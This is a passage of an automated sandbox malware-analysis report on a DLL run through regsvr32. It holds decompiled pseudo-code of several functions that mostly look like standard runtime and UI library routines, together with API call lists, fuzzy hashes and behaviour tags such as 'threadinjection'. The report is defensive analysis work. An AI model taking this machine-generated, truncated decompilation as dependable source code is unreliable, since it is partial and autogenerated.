				_t195 =  !( *(_t220 + 0x18));
				_t231 = _t195 & 0x00000001;
				if((_t195 & 0x00000001) == 0) {
					_push( *((intOrPtr*)(_t220 + 0x14)));
					_push(2);
					E10020287(_t163,  *((intOrPtr*)(_t220 + 0x14)), _t219, _t220, _t231);
				}
				_t153 =  &(( *(_t220 + 0x28))[1]);
				if(_t153 >  *((intOrPtr*)(_t220 + 0x2c))) {
					_t153 = E1001FA65(_t220);
				}
				 *( *(_t220 + 0x28)) = _v4;
				 *(_t220 + 0x28) =  &(( *(_t220 + 0x28))[1]);
				return _t153;
			}


































                                                                                                                0x10014290
                                                                                                                0x10014293
                                                                                                                0x10014297
                                                                                                                0x1001429b
                                                                                                                0x100142a4
                                                                                                                0x100143d1
                                                                                                                0x100143d3
                                                                                                                0x100143d8
                                                                                                                0x100143d9
                                                                                                                0x100143db
                                                                                                                0x100143db
                                                                                                                0x100143e0
                                                                                                                0x100143e3
                                                                                                                0x100143e6
                                                                                                                0x100143e9
                                                                                                                0x100143eb
                                                                                                                0x100143ef
                                                                                                                0x100143f5
                                                                                                                0x100143f5
                                                                                                                0x100143fa
                                                                                                                0x1001440b
                                                                                                                0x1001441a
                                                                                                                0x1001441c
                                                                                                                0x10014420
                                                                                                                0x10014425
                                                                                                                0x10014426
                                                                                                                0x10014428
                                                                                                                0x10014428
                                                                                                                0x1001442d
                                                                                                                0x10014430
                                                                                                                0x10014433
                                                                                                                0x10014436
                                                                                                                0x10014438
                                                                                                                0x1001443c
                                                                                                                0x10014442
                                                                                                                0x10014442
                                                                                                                0x10014447
                                                                                                                0x10014452
                                                                                                                0x10014461
                                                                                                                0x10014463
                                                                                                                0x10014467
                                                                                                                0x1001446c
                                                                                                                0x1001446d
                                                                                                                0x1001446f
                                                                                                                0x1001446f
                                                                                                                0x10014474
                                                                                                                0x10014477
                                                                                                                0x1001447a
                                                                                                                0x1001447d
                                                                                                                0x1001447f
                                                                                                                0x10014483
                                                                                                                0x10014489
                                                                                                                0x10014489
                                                                                                                0x1001448e
                                                                                                                0x10014499
                                                                                                                0x100144a8
                                                                                                                0x100144aa
                                                                                                                0x100144ae
                                                                                                                0x100144b3
                                                                                                                0x100144b4
                                                                                                                0x100144b6
                                                                                                                0x100144b6
                                                                                                                0x100144bb
                                                                                                                0x100144be
                                                                                                                0x100144c1
                                                                                                                0x100144c4
                                                                                                                0x100144c6
                                                                                                                0x100144ca
                                                                                                                0x100144d0
                                                                                                                0x100144d0
                                                                                                                0x100144d5
                                                                                                                0x100144e0
                                                                                                                0x100144ef
                                                                                                                0x10014501
                                                                                                                0x10014503
                                                                                                                0x10014505
                                                                                                                0x100143ce
                                                                                                                0x1001450b
                                                                                                                0x10014513
                                                                                                                0x10014520
                                                                                                                0x1001452d
                                                                                                                0x10014542
                                                                                                                0x10014554
                                                                                                                0x1001456c
                                                                                                                0x1001456c
                                                                                                                0x10014505
                                                                                                                0x100142b6
                                                                                                                0x100142c7
                                                                                                                0x100142e9
                                                                                                                0x100142ed
                                                                                                                0x100142ef
                                                                                                                0x100142ff
                                                                                                                0x10014303
                                                                                                                0x10014308
                                                                                                                0x1001430a
                                                                                                                0x1001430c
                                                                                                                0x10014311
                                                                                                                0x10014312
                                                                                                                0x10014314
                                                                                                                0x10014314
                                                                                                                0x10014326
                                                                                                                0x1001432a
                                                                                                                0x1001432a
                                                                                                                0x10014332
                                                                                                                0x10014334
                                                                                                                0x1001433a
                                                                                                                0x1001433c
                                                                                                                0x1001433f
                                                                                                                0x10014344
                                                                                                                0x10014345
                                                                                                                0x10014347
                                                                                                                0x10014347
                                                                                                                0x10014354
                                                                                                                0x10014358
                                                                                                                0x10014358
                                                                                                                0x10014360
                                                                                                                0x10014362
                                                                                                                0x10014368
                                                                                                                0x1001436a
                                                                                                                0x1001436d
                                                                                                                0x10014372
                                                                                                                0x10014373
                                                                                                                0x10014375
                                                                                                                0x10014375
                                                                                                                0x10014382
                                                                                                                0x10014386
                                                                                                                0x10014386
                                                                                                                0x10014392
                                                                                                                0x10014394
                                                                                                                0x1001439a
                                                                                                                0x1001439c
                                                                                                                0x1001439f
                                                                                                                0x100143a4
                                                                                                                0x100143a5
                                                                                                                0x100143a7
                                                                                                                0x100143a7
                                                                                                                0x100143af
                                                                                                                0x100143b4
                                                                                                                0x100143b8
                                                                                                                0x100143b8
                                                                                                                0x100143c4
                                                                                                                0x100143c6
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$Exception@8H_prolog3Throw
                                                                                                                • String ID:
                                                                                                                • API String ID: 2952110909-0
                                                                                                                • Opcode ID: bf840e01c7514d2540411e702dc27d12f361d6ee476bee38d37ef4a0a16736af
                                                                                                                • Instruction ID: 799a79b79d5c8d11ebf5c911212c3c5f29a23d589c12ce2fa1e42d3b04ba1764
                                                                                                                • Opcode Fuzzy Hash: bf840e01c7514d2540411e702dc27d12f361d6ee476bee38d37ef4a0a16736af
                                                                                                                • Instruction Fuzzy Hash: 9D916175340B02AFE224DB65CC92F66B3E5EF48724F11461CF24A9BA91CF74F8818B54
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 10023B13 Relevance: 18.1, APIs: 12, Instructions: 91synchronizationthreadinjectionCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E10023B13(intOrPtr __ecx, void* __edx, signed char _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _v8;
				void* _v12;
				void* _v16;
				signed int _v24;
				intOrPtr _v28;
				char _v32;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t41;
				void* _t55;
				void* _t56;
				intOrPtr _t59;

				_t55 = __edx;
				_t59 = __ecx;
				_t63 =  *((intOrPtr*)(__ecx + 0x2c));
				if( *((intOrPtr*)(__ecx + 0x2c)) != 0) {
					E1001729E(0, __ecx, _t56, __ecx, _t63);
				}
				E1003BB70(_t56,  &_v32, 0, 0x1c);
				_v32 = E10022C52(0, _t56, _t59, _t63);
				_v28 = _t59;
				_v16 = CreateEventA(0, 1, 0, 0);
				_v12 = CreateEventA(0, 1, 0, 0);
				_t35 = _a4;
				_v24 = _a4;
				if(_v16 == 0) {
					L11:
					__eflags = _v12;
					if(_v12 == 0) {
						goto L13;
					}
					goto L12;
				} else {
					if(_v12 == 0) {
						CloseHandle(_v16);
						goto L11;
					}
					_t41 = E10040AD8(_t55, _a12, _a8, E100239FB,  &_v32, _t35 | 0x00000004, _t59 + 0x30);
					 *(_t59 + 0x2c) = _t41;
					if(_t41 == 0) {
						L13:
						return 0;
					}
					ResumeThread(_t41);
					WaitForSingleObject(_v16, 0xffffffff);
					CloseHandle(_v16);
					if((_a4 & 0x00000004) != 0) {
						SuspendThread( *(_t59 + 0x2c));
					}
					if(_v8 == 0) {
						SetEvent(_v12);
						return 1;
					} else {
						WaitForSingleObject( *(_t59 + 0x2c), 0xffffffff);
						CloseHandle( *(_t59 + 0x2c));
						 *(_t59 + 0x2c) = 0;
						L12:
						CloseHandle(_v12);
						goto L13;
					}
				}
			}

















                                                                                                                0x10023b13
                                                                                                                0x10023b1b
                                                                                                                0x10023b1f
                                                                                                                0x10023b23
                                                                                                                0x10023b25
                                                                                                                0x10023b25
                                                                                                                0x10023b31
                                                                                                                0x10023b49
                                                                                                                0x10023b4c
                                                                                                                0x10023b56
                                                                                                                0x10023b64
                                                                                                                0x10023b67
                                                                                                                0x10023b6a
                                                                                                                0x10023b6d
                                                                                                                0x10023bed
                                                                                                                0x10023bed
                                                                                                                0x10023bf0
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10023b6f
                                                                                                                0x10023b72
                                                                                                                0x10023beb
                                                                                                                0x00000000
                                                                                                                0x10023beb
                                                                                                                0x10023b8b
                                                                                                                0x10023b95
                                                                                                                0x10023b98
                                                                                                                0x10023bf7
                                                                                                                0x00000000
                                                                                                                0x10023bf7
                                                                                                                0x10023b9b
                                                                                                                0x10023ba6
                                                                                                                0x10023baf
                                                                                                                0x10023bb5
                                                                                                                0x10023bba
                                                                                                                0x10023bba
                                                                                                                0x10023bc3
                                                                                                                0x10023bdd
                                                                                                                0x00000000
                                                                                                                0x10023bc5
                                                                                                                0x10023bca
                                                                                                                0x10023bd3
                                                                                                                0x10023bd5
                                                                                                                0x10023bf2
                                                                                                                0x10023bf5
                                                                                                                0x00000000
                                                                                                                0x10023bf5
                                                                                                                0x10023bc3

                                                                                                                APIs
                                                                                                                • _memset.LIBCMT ref: 10023B31
                                                                                                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 10023B4F
                                                                                                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 10023B59
                                                                                                                • ResumeThread.KERNEL32(00000000), ref: 10023B9B
                                                                                                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 10023BA6
                                                                                                                • CloseHandle.KERNEL32(?), ref: 10023BAF
                                                                                                                • SuspendThread.KERNEL32(?), ref: 10023BBA
                                                                                                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 10023BCA
                                                                                                                • CloseHandle.KERNEL32(?), ref: 10023BD3
                                                                                                                • CloseHandle.KERNEL32(?), ref: 10023BF5
                                                                                                                  • Part of subcall function 1001729E: __CxxThrowException@8.LIBCMT ref: 100172B2
                                                                                                                  • Part of subcall function 1001729E: __EH_prolog3.LIBCMT ref: 100172BF
                                                                                                                • SetEvent.KERNEL32(00000004), ref: 10023BDD
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseEventHandle$CreateObjectSingleThreadWait$Exception@8H_prolog3ResumeSuspendThrow_memset
                                                                                                                • String ID:
                                                                                                                • API String ID: 3256170895-0
                                                                                                                • Opcode ID: 6fe4a5408cef7c50b8e17eb3e6281a495fe489ddceb07d2ffebb2e367f73edd5
                                                                                                                • Instruction ID: bcf15dfb87e31a0624e6b54508bba83dfbd3c581a66068fe1aeb0b250c0b91f9
                                                                                                                • Opcode Fuzzy Hash: 6fe4a5408cef7c50b8e17eb3e6281a495fe489ddceb07d2ffebb2e367f73edd5
                                                                                                                • Instruction Fuzzy Hash: 6F312C72C00209BFDB01EFA4EC85D9EBBB9FF08354F50866AF615A2560DB719A51CF50
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 100252AB Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 56libraryloaderCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E100252AB(intOrPtr* __ecx, void* __esi, intOrPtr _a4) {
				void* __ebx;
				void* __edi;
				void* __ebp;
				_Unknown_base(*)()* _t9;
				struct HINSTANCE__* _t15;
				void* _t16;
				intOrPtr* _t18;
				char _t19;
				intOrPtr _t21;
				_Unknown_base(*)()* _t22;
				_Unknown_base(*)()* _t23;

				_t16 = __esi;
				_t12 = __ecx;
				_t18 = __ecx;
				 *__ecx = _a4;
				_a4 = 0;
				_t19 =  *0x10070c48; // 0x0
				if(_t19 == 0) {
					_t15 = GetModuleHandleA("KERNEL32");
					_t20 = _t15;
					if(_t15 == 0) {
						L2:
						E1001729E(0, _t12, _t15, _t16, _t20);
					}
					 *0x10070c38 = GetProcAddress(_t15, "CreateActCtxA");
					 *0x10070c3c = GetProcAddress(_t15, "ReleaseActCtx");
					 *0x10070c40 = GetProcAddress(_t15, "ActivateActCtx");
					_t9 = GetProcAddress(_t15, "DeactivateActCtx");
					_t21 =  *0x10070c38; // 0x0
					 *0x10070c44 = _t9;
					_t16 = _t16;
					if(_t21 == 0) {
						__eflags =  *0x10070c3c; // 0x0
						if(__eflags != 0) {
							goto L2;
						} else {
							__eflags =  *0x10070c40; // 0x0
							if(__eflags != 0) {
								goto L2;
							} else {
								__eflags = _t9;
								if(__eflags != 0) {
									goto L2;
								}
							}
						}
					} else {
						_t22 =  *0x10070c3c; // 0x0
						if(_t22 == 0) {
							goto L2;
						} else {
							_t23 =  *0x10070c40; // 0x0
							if(_t23 == 0) {
								goto L2;
							} else {
								_t20 = _t9;
								if(_t9 == 0) {
									goto L2;
								}
							}
						}
					}
					 *0x10070c48 = 1;
				}
				return _t18;
			}














                                                                                                                0x100252ab
                                                                                                                0x100252ab
                                                                                                                0x100252b1
                                                                                                                0x100252b5
                                                                                                                0x100252b8
                                                                                                                0x100252bb
                                                                                                                0x100252c2
                                                                                                                0x100252d3
                                                                                                                0x100252d5
                                                                                                                0x100252d7
                                                                                                                0x100252d9
                                                                                                                0x100252d9
                                                                                                                0x100252d9
                                                                                                                0x100252f3
                                                                                                                0x10025300
                                                                                                                0x1002530d
                                                                                                                0x10025312
                                                                                                                0x10025314
                                                                                                                0x1002531a
                                                                                                                0x1002531f
                                                                                                                0x10025320
                                                                                                                0x10025338
                                                                                                                0x1002533e
                                                                                                                0x00000000
                                                                                                                0x10025340
                                                                                                                0x10025340
                                                                                                                0x10025346
                                                                                                                0x00000000
                                                                                                                0x10025348
                                                                                                                0x10025348
                                                                                                                0x1002534a
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1002534a
                                                                                                                0x10025346
                                                                                                                0x10025322
                                                                                                                0x10025322
                                                                                                                0x10025328
                                                                                                                0x00000000
                                                                                                                0x1002532a
                                                                                                                0x1002532a
                                                                                                                0x10025330
                                                                                                                0x00000000
                                                                                                                0x10025332
                                                                                                                0x10025332
                                                                                                                0x10025334
                                                                                                                0x00000000
                                                                                                                0x10025336
                                                                                                                0x10025334
                                                                                                                0x10025330
                                                                                                                0x10025328
                                                                                                                0x1002534c
                                                                                                                0x1002534c
                                                                                                                0x10025358

                                                                                                                APIs
                                                                                                                • GetModuleHandleA.KERNEL32(KERNEL32,00000000,?,00000020,10025CD9,000000FF), ref: 100252CD
                                                                                                                • GetProcAddress.KERNEL32(00000000,CreateActCtxA,10000000), ref: 100252EB
                                                                                                                • GetProcAddress.KERNEL32(00000000,ReleaseActCtx), ref: 100252F8
                                                                                                                • GetProcAddress.KERNEL32(00000000,ActivateActCtx), ref: 10025305
                                                                                                                • GetProcAddress.KERNEL32(00000000,DeactivateActCtx), ref: 10025312
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc$HandleModule
                                                                                                                • String ID: ActivateActCtx$CreateActCtxA$DeactivateActCtx$KERNEL32$ReleaseActCtx
                                                                                                                • API String ID: 667068680-3617302793
                                                                                                                • Opcode ID: fd2fed17c0c0498abed4b040eb62f5add90f349c94c9f0d03b817c527ce8cf40
                                                                                                                • Instruction ID: a62262e3b0bffdb13dbd19011fdd4316014651cabadfc1ee22f31bb77626f904
                                                                                                                • Opcode Fuzzy Hash: fd2fed17c0c0498abed4b040eb62f5add90f349c94c9f0d03b817c527ce8cf40
                                                                                                                • Instruction Fuzzy Hash: 5211A0758013A9EBE711DF69ACD4449BEE4E706152760873FF686A3010EB795888CF15
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 10021343 Relevance: 16.6, APIs: 11, Instructions: 139COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 94%
                                                                                                                			E10021343(void* __ebx, signed int __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t54;
				void* _t58;
				signed int _t59;
				signed int _t63;
				signed short _t71;
				signed int _t84;
				void* _t94;
				struct HINSTANCE__* _t96;
				signed int _t97;
				void* _t98;
				signed int _t100;
				void* _t101;
				void* _t102;

				_t102 = __eflags;
				_t94 = __edx;
				_push(0x24);
				E1003D219(E1005356D, __ebx, __edi, __esi);
				_t100 = __ecx;
				 *((intOrPtr*)(_t101 - 0x20)) = __ecx;
				 *(_t101 - 0x1c) =  *(__ecx + 0x60);
				 *(_t101 - 0x18) =  *(__ecx + 0x5c);
				_t54 = E10023187(__ebx, __edi, __ecx, _t102);
				_t96 =  *(_t54 + 0xc);
				_t84 = 0;
				_t103 =  *(_t100 + 0x58);
				if( *(_t100 + 0x58) != 0) {
					_t96 =  *(E10023187(0, _t96, _t100, _t103) + 0xc);
					_t54 = LoadResource(_t96, FindResourceA(_t96,  *(_t100 + 0x58), 5));
					 *(_t101 - 0x18) = _t54;
				}
				if( *(_t101 - 0x18) != _t84) {
					_t54 = LockResource( *(_t101 - 0x18));
					 *(_t101 - 0x1c) = _t54;
				}
				if( *(_t101 - 0x1c) != _t84) {
					_t86 = _t100;
					 *(_t101 - 0x14) = E10020E9D(_t84, _t100, __eflags);
					E10019CBE(_t84, _t96, __eflags);
					 *(_t101 - 0x28) =  *(_t101 - 0x28) & _t84;
					__eflags =  *(_t101 - 0x14) - _t84;
					 *(_t101 - 0x2c) = _t84;
					 *(_t101 - 0x24) = _t84;
					if(__eflags != 0) {
						__eflags =  *(_t101 - 0x14) - GetDesktopWindow();
						if(__eflags != 0) {
							__eflags = IsWindowEnabled( *(_t101 - 0x14));
							if(__eflags != 0) {
								EnableWindow( *(_t101 - 0x14), 0);
								 *(_t101 - 0x2c) = 1;
								_t84 = E10004700();
								__eflags = _t84;
								 *(_t101 - 0x24) = _t84;
								if(__eflags != 0) {
									_t86 = _t84;
									__eflags =  *((intOrPtr*)( *_t84 + 0x120))();
									if(__eflags != 0) {
										_t86 = _t84;
										__eflags = E1001D37F(_t84);
										if(__eflags != 0) {
											_t86 = _t84;
											E1001D39A(_t84, 0);
											 *(_t101 - 0x28) = 1;
										}
									}
								}
							}
						}
					}
					 *(_t101 - 4) =  *(_t101 - 4) & 0x00000000;
					E1001B7F6(_t96, __eflags, _t100);
					_t58 = E10019C16(_t84, _t86, _t101,  *(_t101 - 0x14));
					_push(_t96);
					_push(_t58);
					_push( *(_t101 - 0x1c));
					_t59 = E10021153(_t84, _t100, _t94, _t96, _t100, __eflags);
					_t97 = 0;
					__eflags = _t59;
					if(_t59 != 0) {
						__eflags =  *(_t100 + 0x3c) & 0x00000010;
						if(( *(_t100 + 0x3c) & 0x00000010) != 0) {
							_t98 = 4;
							_t71 = E1001D23C(_t100);
							__eflags = _t71 & 0x00000100;
							if((_t71 & 0x00000100) != 0) {
								_t98 = 5;
							}
							E100197B9(_t100, _t98);
							_t97 = 0;
							__eflags = 0;
						}
						__eflags =  *((intOrPtr*)(_t100 + 0x20)) - _t97;
						if( *((intOrPtr*)(_t100 + 0x20)) != _t97) {
							E1001D569(_t100, _t97, _t97, _t97, _t97, _t97, 0x97);
						}
					}
					 *(_t101 - 4) =  *(_t101 - 4) | 0xffffffff;
					__eflags =  *(_t101 - 0x28) - _t97;
					if( *(_t101 - 0x28) != _t97) {
						E1001D39A(_t84, 1);
					}
					__eflags =  *(_t101 - 0x2c) - _t97;
					if( *(_t101 - 0x2c) != _t97) {
						EnableWindow( *(_t101 - 0x14), 1);
					}
					__eflags =  *(_t101 - 0x14) - _t97;
					if(__eflags != 0) {
						__eflags = GetActiveWindow() -  *((intOrPtr*)(_t100 + 0x20));
						if(__eflags == 0) {
							SetActiveWindow( *(_t101 - 0x14));
						}
					}
					 *((intOrPtr*)( *_t100 + 0x60))();
					E10020ED7(_t84, _t100, _t97, _t100, __eflags);
					__eflags =  *(_t100 + 0x58) - _t97;
					if( *(_t100 + 0x58) != _t97) {
						FreeResource( *(_t101 - 0x18));
					}
					_t63 =  *(_t100 + 0x44);
					goto L31;
				} else {
					_t63 = _t54 | 0xffffffff;
					L31:
					return E1003D2BE(_t63);
				}
			}
















                                                                                                                0x10021343
                                                                                                                0x10021343
                                                                                                                0x10021343
                                                                                                                0x1002134a
                                                                                                                0x1002134f
                                                                                                                0x10021351
                                                                                                                0x10021357
                                                                                                                0x1002135d
                                                                                                                0x10021360
                                                                                                                0x10021365
                                                                                                                0x10021368
                                                                                                                0x1002136a
                                                                                                                0x1002136d
                                                                                                                0x10021374
                                                                                                                0x10021385
                                                                                                                0x1002138b
                                                                                                                0x1002138b
                                                                                                                0x10021391
                                                                                                                0x10021396
                                                                                                                0x1002139c
                                                                                                                0x1002139c
                                                                                                                0x100213a2
                                                                                                                0x100213ac
                                                                                                                0x100213b3
                                                                                                                0x100213b6
                                                                                                                0x100213bb
                                                                                                                0x100213be
                                                                                                                0x100213c1
                                                                                                                0x100213c4
                                                                                                                0x100213c7
                                                                                                                0x100213cf
                                                                                                                0x100213d2
                                                                                                                0x100213dd
                                                                                                                0x100213df
                                                                                                                0x100213e6
                                                                                                                0x100213ec
                                                                                                                0x100213f8
                                                                                                                0x100213fa
                                                                                                                0x100213fc
                                                                                                                0x100213ff
                                                                                                                0x10021403
                                                                                                                0x1002140b
                                                                                                                0x1002140d
                                                                                                                0x1002140f
                                                                                                                0x10021416
                                                                                                                0x10021418
                                                                                                                0x1002141c
                                                                                                                0x1002141e
                                                                                                                0x10021423
                                                                                                                0x10021423
                                                                                                                0x10021418
                                                                                                                0x1002140d
                                                                                                                0x100213ff
                                                                                                                0x100213df
                                                                                                                0x100213d2
                                                                                                                0x1002142a
                                                                                                                0x1002142f
                                                                                                                0x10021437
                                                                                                                0x1002143c
                                                                                                                0x1002143d
                                                                                                                0x1002143e
                                                                                                                0x10021443
                                                                                                                0x10021448
                                                                                                                0x1002144a
                                                                                                                0x1002144c
                                                                                                                0x1002144e
                                                                                                                0x10021452
                                                                                                                0x10021456
                                                                                                                0x10021459
                                                                                                                0x1002145e
                                                                                                                0x10021462
                                                                                                                0x10021466
                                                                                                                0x10021466
                                                                                                                0x1002146a
                                                                                                                0x1002146f
                                                                                                                0x1002146f
                                                                                                                0x1002146f
                                                                                                                0x10021471
                                                                                                                0x10021474
                                                                                                                0x10021482
                                                                                                                0x10021482
                                                                                                                0x10021474
                                                                                                                0x10021487
                                                                                                                0x100214aa
                                                                                                                0x100214ad
                                                                                                                0x100214b3
                                                                                                                0x100214b3
                                                                                                                0x100214b8
                                                                                                                0x100214bb
                                                                                                                0x100214c2
                                                                                                                0x100214c2
                                                                                                                0x100214c8
                                                                                                                0x100214cb
                                                                                                                0x100214d3
                                                                                                                0x100214d6
                                                                                                                0x100214db
                                                                                                                0x100214db
                                                                                                                0x100214d6
                                                                                                                0x100214e5
                                                                                                                0x100214ea
                                                                                                                0x100214ef
                                                                                                                0x100214f2
                                                                                                                0x100214f7
                                                                                                                0x100214f7
                                                                                                                0x100214fd
                                                                                                                0x00000000
                                                                                                                0x100213a4
                                                                                                                0x100213a4
                                                                                                                0x10021500
                                                                                                                0x10021505
                                                                                                                0x10021505

                                                                                                                APIs
                                                                                                                • __EH_prolog3_catch.LIBCMT ref: 1002134A
                                                                                                                • FindResourceA.KERNEL32 ref: 1002137D
                                                                                                                • LoadResource.KERNEL32(?,00000000), ref: 10021385
                                                                                                                • LockResource.KERNEL32(?,00000024,10009C92), ref: 10021396
                                                                                                                • GetDesktopWindow.USER32 ref: 100213C9
                                                                                                                • IsWindowEnabled.USER32(?), ref: 100213D7
                                                                                                                • EnableWindow.USER32(?,00000000), ref: 100213E6
                                                                                                                  • Part of subcall function 1001D37F: IsWindowEnabled.USER32(?), ref: 1001D388
                                                                                                                  • Part of subcall function 1001D39A: EnableWindow.USER32(?,00000000), ref: 1001D3A7
                                                                                                                • EnableWindow.USER32(?,00000001), ref: 100214C2
                                                                                                                • GetActiveWindow.USER32 ref: 100214CD
                                                                                                                • SetActiveWindow.USER32(?), ref: 100214DB
                                                                                                                • FreeResource.KERNEL32(?,?,00000024,10009C92), ref: 100214F7
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$Resource$Enable$ActiveEnabled$DesktopFindFreeH_prolog3_catchLoadLock
                                                                                                                • String ID:
                                                                                                                • API String ID: 1509511306-0
                                                                                                                • Opcode ID: 337ad1a63b2d6bde616ace9a407e3d7c868c2b696f3812ada9cc6af12ad298e8
                                                                                                                • Instruction ID: 35651345c3de5f526abb446b9f3eb7b658c9eb69d0e543655bbc2de7d47d2b60
                                                                                                                • Opcode Fuzzy Hash: 337ad1a63b2d6bde616ace9a407e3d7c868c2b696f3812ada9cc6af12ad298e8
                                                                                                                • Instruction Fuzzy Hash: ED51BC38A00605CBDF11EFA0AC85AAEBBF1FF58741F60442AF446A6291DB709A81CB51
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1003840A Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 113librarymemoryloaderCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 73%
                                                                                                                			E1003840A(void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr* _a4, signed int* _a8, signed int _a12) {
				struct HINSTANCE__* _v8;
				void* __ebx;
				void* __ebp;
				signed int _t24;
				struct HINSTANCE__* _t28;
				long _t32;
				void* _t33;
				_Unknown_base(*)()* _t38;
				struct HRSRC__* _t39;
				void* _t40;
				signed short _t42;
				void* _t50;
				void* _t51;
				void* _t61;
				void* _t66;
				void* _t67;
				void* _t69;
				signed int _t72;
				void* _t76;
				void* _t77;

				_t69 = __esi;
				_t67 = __edi;
				_t66 = __edx;
				_push(__ecx);
				_push(_t50);
				_push(E100383EC);
				_t51 = E1002D1BB(_t50, 0x10070f20, __edi, __esi, __eflags);
				_t80 = _t51;
				if(_t51 == 0) {
					E1001729E(_t51, 0x10070f20, __edi, __esi, _t80);
				}
				_t81 =  *(_t51 + 8);
				if( *(_t51 + 8) != 0) {
					L15:
					E10002070(_t66, _t67,  *(_t51 + 4));
					_t24 =  *(_t51 + 8) & 0x0000ffff;
					 *_a8 = _t24;
					return 0 | _t24 != 0x0000ffff;
				} else {
					_push(_t69);
					_t28 = E1000BE70( *((intOrPtr*)( *((intOrPtr*)(E10023187(_t51, _t67, _t69, _t81) + 0x78)))));
					_v8 = _t28;
					if(_t28 == 0) {
						L12:
						_t70 = _a4;
						_t32 = E10001710( *((intOrPtr*)( *_a4 - 0xc)) + 1, 1);
						_pop(_t61);
						_t33 = GlobalAlloc(0x40, _t32);
						_t89 = _t33;
						 *(_t51 + 4) = _t33;
						if(_t33 == 0) {
							_t33 = E1001726A(_t51, _t61, _t67, _t70, _t89);
						}
						E100202D5(_t51, _t66, _t67, _t70, _t76, _t33,  *((intOrPtr*)( *_t70 - 0xc)) + 1,  *_t70);
						 *(_t51 + 8) =  *_a8;
						goto L15;
					}
					_push(_t67);
					_t38 = GetProcAddress(GetModuleHandleA("KERNEL32.DLL"), "GetUserDefaultUILanguage");
					_t72 = _a12;
					if(_t38 == 0) {
						L8:
						asm("sbb esi, esi");
						_t39 = FindResourceA(_v8, ( ~_t72 & 0x0000000e) + 0x3ee, 5);
						if(_t39 == 0) {
							L11:
							_pop(_t67);
							goto L12;
						}
						L9:
						_t40 = LoadResource(_v8, _t39);
						_t88 = _t40;
						if(_t40 != 0) {
							E100353FB(_t88, _t40, _a4, _a8);
